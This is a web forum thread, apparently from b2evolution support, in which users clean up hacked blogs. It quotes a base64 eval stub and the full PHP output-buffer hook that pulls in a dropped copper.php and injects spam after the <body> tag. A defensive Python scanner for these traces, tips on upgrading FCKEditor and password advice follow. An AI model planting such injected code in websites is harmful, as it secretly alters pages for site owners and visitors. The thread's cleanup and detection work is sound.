2 tblue Nov 19, 2008 22:34

Here's the code you should delete from skins/custom/_main.php
<? /**/eval(base64_decode('aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
p.s.
It's a lot longer than in my example. And try to find the file named copper.php; use search in files/directories. Rename or delete it (at your own risk) when you find this file.
What version of coppermine gallery are you running?
¥åßßå, it has nothing to do with coppermine gallery, it's just a file generating spam.
You may want to read this.
http://www.tinyportal.net/index.php?action=printpage;topic=26106.0
http://www.xoops.org/modules/newbb/viewtopic.php?post_id=297046
BTW, here's the full code I found in nelsonguirado's index.main.php
if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) )
{
    $GLOBALS['sh_no'] = 1; // run-once guard: nested includes must not install the hook twice
    if( file_exists('/LONG_PATH/copper.php') )
    {
        include_once('/LONG_PATH/copper.php'); // the dropped file; it defines gml(), which produces the spam markup
        if( function_exists('gml') && !function_exists('dgobh') )
        {
            if( !function_exists('gzdecode') ) // polyfill for PHP builds without gzdecode(): skip the gzip header, inflate the rest
            {
                function gzdecode( $R20FD65E9C7406034FADC682F06732868 )
                {
                    $R6B6E98CDE8B33087A33E4D3A497BD86B = ord( substr($R20FD65E9C7406034FADC682F06732868,3,1) ); // gzip FLG byte
                    $R60169CD1C47B7A7A85AB44F884635E41 = 10; // fixed part of the gzip header
                    $R0D54236DA20594EC13FC81B209733931 = 0;
                    if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 4 ) // FEXTRA: 2-byte length plus extra field
                    {
                        $R0D54236DA20594EC13FC81B209733931 = unpack( 'v', substr($R20FD65E9C7406034FADC682F06732868,10,2) );
                        $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2 + $R0D54236DA20594EC13FC81B209733931;
                    }
                    if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 8 ) // FNAME: zero-terminated original file name
                    {
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 16 ) // FCOMMENT: zero-terminated comment
                    {
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 2 ) // FHCRC: 2-byte header CRC
                    {
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2;
                    }
                    $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
                    if( $RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE ) // not gzip after all: hand back the buffer untouched
                    {
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
                    }
                    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                }
            }
            // Output-buffer callback: decompress the page, then plant gml() right after <body> (or at the very top)
            function dgobh( $RDA3E61414E50AEE968132F03D265E0CF )
            {
                Header('Content-Encoding: none'); // the buffer is sent uncompressed after the rewrite
                $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                if( preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90) )
                {
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                }
                else
                {
                    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                }
            }
            ob_start('dgobh'); // every page rendered from here on passes through the injector
        }
    }
}
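A defender-side scanner for the traces this injector leaves behind, added here as an example; it is not code from the thread or from b2evolution. It assumes a tree of .php files such as skins/; the indicator strings (the sh_no guard, the copper.php include, the dgobh hook, the rewrite after <body>) are taken from the code quoted above, the sample file contents are constructed, and the one base64 payload is the stub quoted at the top of the thread, decoded for reading rather than executed:

```python
"""Scan a skins tree for the output-buffer spam injector discussed in the thread.
Added example: finds the eval(base64_decode(...)) stub, the $GLOBALS['sh_no']
guard, the copper.php include, the ob_start('dgobh') hook and the <body>
rewrite, and decodes any base64 payload so a reviewer can read it."""
import base64
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional, Tuple

# eval(base64_decode('...')) with the payload captured for decoding.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.I)

# Literal markers lifted from the code quoted in the thread.
MARKERS = {
    "sh_no_guard": re.compile(r"\$GLOBALS\[\s*['\"]sh_no['\"]\s*\]"),
    "copper_include": re.compile(
        r"include(?:_once)?\s*\(?\s*['\"][^'\"]*copper\.php['\"]", re.I),
    "ob_start_hook": re.compile(r"ob_start\s*\(\s*['\"]dgobh['\"]\s*\)", re.I),
    "body_inject": re.compile(r"preg_replace\s*\(\s*['\"]/\(\\<body", re.I),
}


@dataclass
class Finding:
    path: str
    markers: List[str] = field(default_factory=list)
    decoded_payloads: List[str] = field(default_factory=list)


def decode_payload(b64: str) -> str:
    """Decode a base64 blob for reading; it is never evaluated."""
    padded = b64 + "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(padded).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return "<undecodable>"


def scan_source(path: str, source: str) -> Optional[Finding]:
    """Return a Finding when the PHP source carries any indicator, else None."""
    finding = Finding(path=path)
    for name, pattern in MARKERS.items():
        if pattern.search(source):
            finding.markers.append(name)
    payloads = EVAL_B64.findall(source)
    if payloads:
        finding.markers.append("eval_base64")
        finding.decoded_payloads = [decode_payload(p) for p in payloads]
    return finding if finding.markers else None


def scan_tree(root: str) -> List[Finding]:
    """Scan every .php file under root (for example the skins/ directory)."""
    findings = []
    for php in sorted(Path(root).rglob("*.php")):
        try:
            source = php.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        found = scan_source(str(php), source)
        if found:
            findings.append(found)
    return findings


# Constructed samples (not files from anyone's server); the base64 stub is the
# one quoted in the thread.
INFECTED_STUB = ("<? /**/eval(base64_decode("
                 "'aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>\n"
                 "<html><body>skin</body></html>\n")
INFECTED_MAIN = r"""<?php
if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) ) {
    $GLOBALS['sh_no'] = 1;
    include_once('/LONG_PATH/copper.php');
    function dgobh($buf) {
        return preg_replace('/(\<body[^\>]*\>)/si', '$1'.gml(), $buf);
    }
    ob_start('dgobh');
}
"""
CLEAN_SKIN = "<?php ob_start(); ?>\n<html><body><?php skin_content(); ?></body></html>\n"


def demo_in_tempdir() -> List[Tuple[str, List[str]]]:
    """Write the samples into a throwaway skins/custom tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        custom = Path(root, "skins", "custom")
        custom.mkdir(parents=True)
        (custom / "_main.php").write_text(INFECTED_MAIN)
        (custom / "index.main.php").write_text(INFECTED_STUB)
        (custom / "_footer.php").write_text(CLEAN_SKIN)
        return [(Path(f.path).name, f.markers) for f in scan_tree(root)]


if __name__ == "__main__":
    for name, markers in demo_in_tempdir():
        print(f"{name}: {', '.join(markers)}")
    print(decode_payload("aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=="))
```

A plain ob_start() in a legitimate skin is not flagged; only the named callback and the other literals from the quoted code count, which keeps false positives down on a real skins directory. The decoded stub shows why a hit needs a human look: the quoted fragment is only the tail of a longer payload, and the decoder exists so nobody has to run it to see that.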
That's cool, but for the file to be edited the attacker needed a door ;)
They're both running different evo versions and they're both running coppermine, just not sure of the versions.
That's the reason why privatjokr should change his passwords (and check other files/scripts for vulnerabilities).
This virus is known to enter through upload in FCKEditor (v2.3). The solution is to upgrade that to 2.6.
Yabba may be on to something. Another site I have, www.magnasquids.com, had Coppermine, and its SMF forum was hacked with the same copper thing.
My hacked blog, on another server, had a Coppermine installation in the same directory.
By the way, I love blogging again, thanks to you guys. I hope you guys stick around for a long time.
Thanks for the reply! Interesting... Perhaps I will revisit after some sleep then... ;)
You may want to upgrade to the latest b2evolution version. Also consider changing your passwords.
Well, I've no experience with b2evo v1.9.x, so I can't really help you, sorry.